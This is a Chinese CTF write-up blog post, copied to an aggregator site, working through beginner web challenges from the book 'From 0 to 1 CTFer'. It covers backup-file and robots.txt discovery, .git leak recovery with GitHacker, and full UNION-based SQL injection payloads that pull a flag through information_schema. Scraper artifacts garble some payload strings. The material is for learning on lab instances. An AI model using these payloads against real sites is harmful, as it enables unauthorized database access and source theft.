PHP   发布时间:2022-04-04  发布网站:大佬教程  code.js-code.com
大佬教程收集整理的这篇文章主要介绍了N1BOOK 记录大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。

《从0到1 CTFer成长之路》

[第一章 web入门]常见的搜集

先验知识:常见的敏感文件

  1. gedit备份文件,格式为filename~,比如index.PHP~@H_502_12@
  2. vim备份文件,格式为.filename.swp或者*.swo或者*.swn,比如.index.PHP.swp@H_502_12@
  3. robots.txt@H_502_12@

方法

  1. 地址后加/index.PHP~

    N1BOOK 记录

    @H_502_12@
  2. /.index.PHP.swp会即刻下载备份文件,可通过vi index.PHP建@L_197_14@只有空格的文件,然后通过vim -r index.PHP进行恢复即可得到

    N1BOOK 记录

    @H_502_12@
  3. /robots.txt
    ![](img src=https://www.icode9.com/i/l/?n=20&i=blog/1931211/202011/1931211-20201109224118439-1125637828.png)
    查看这个文本文件

    N1BOOK 记录


    综上可得@H_502_12@

[第一章 web入门]粗心的小李

git泄露

N1BOOK 记录

方法

  1. 借助GitHacker工具@H_502_12@
  2. git clone https://github.com/WangYihang/GitHacker.git@H_502_12@
  3. cd GitHacker@H_502_12@
  4. python Githacker.py http://0fcbe3ec-471a-452a-9e5f-953c5026eb18.node3.buuoj.cn/.git

    N1BOOK 记录

    @H_502_12@
  5. 进入恢复后的文件cd 0fcbe3ec-471a-452a-9e5f-953c5026eb18_node3_buuoj_cn_,有个index.html

    N1BOOK 记录

    @H_502_12@
  6. 浏览器打开index.html即可拿到flag

    N1BOOK 记录

    @H_502_12@

[第一章 web入门]sql注入-1

  1. 打开题目链接可以看到

    N1BOOK 记录

    @H_502_12@
  2. 试试id=1+1的回显,发现和id=1结果相同,所以不是数字型注入,可能是字符型

    N1BOOK 记录

    @H_502_12@
  3. 尝试id=1a发现和id=1结果相同,所以确实是字符型

    N1BOOK 记录

    @H_502_12@
  4. 尝试用id=1'#,单引号用于闭合前面的单引号,井号用于注释后面预置的单引号。这里注意:#一定要用URL编码,即%23,所以实际上需要输入id=1'%23单引号会被自动转成%27

    N1BOOK 记录

    @H_502_12@
  5. 可以成功显示@H_502_12@
  6. 优先尝试UNION注入id=-1'union SELEct 1,2,3%23,其中-1是为了使第一行记录无法被@L_262_40@到,当然,除了-1也可以是@L_197_14@很大的值比如1024、100等。后面的@L_262_40@语句是尝试测试哪些字段可以回显参考

    N1BOOK 记录

    @H_502_12@
  7. 所以将数字2改成我们想@L_262_40@的内容:所有表名GROUP_CONCAt(table_Name)GROUP_CONCAt是用,联合多行记录的函数。所以为@L_262_40@本数据库的其他所有表名,需id=-1'union SELEct 1,GROUP_CONCAt(table_Name),3 from information_scheR_675_11845@a.tables where table_scheR_675_11845@a=database()%23,随即看到fl4g

    N1BOOK 记录

    @H_502_12@
  8. @L_262_40@fl4g中的字段名,id=-1'union SELEct 1,GROUP_CONCAt(column_Name),3 from information_scheR_675_11845@a.columns where table_name='fl4g'%23

    N1BOOK 记录

    @H_502_12@
  9. 获取fllllag的内容id=-1'union SELEct 1,fllllag,3 from fl4g%23

    N1BOOK 记录

    @H_502_12@

[第五章 CTF之RE章]Hello, RE

直接拖到ida64反编译即可看到flag

N1BOOK 记录

大佬总结

以上是大佬教程为你收集整理的N1BOOK 记录全部内容,希望文章能够帮你解决N1BOOK 记录所遇到的程序开发问题。

如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
标签: